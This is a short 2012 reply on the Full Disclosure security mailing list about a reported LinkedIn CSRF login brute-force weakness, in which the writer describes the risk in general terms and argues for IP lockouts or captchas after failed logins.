Full Disclosure mailing list archives

Re: LinkedIn CSRF: Login Brute Force

From: Alexander Georgiev <alexander.georgiev () daloo de>
Date: Fri, 18 May 2012 12:22:45 +0200

I agree with you, that this is nothing more than doing it via the login
form, but it is not so useless at all. It can be used by an attacker if
he has a bunch of email addresses and want to try "the common"
passwords, since the attack can be implemented very easy. I would expect
LinkedIn to should stop an IP after X wrong logins (no mather if via
this method or normal login) or use some kind of captcha.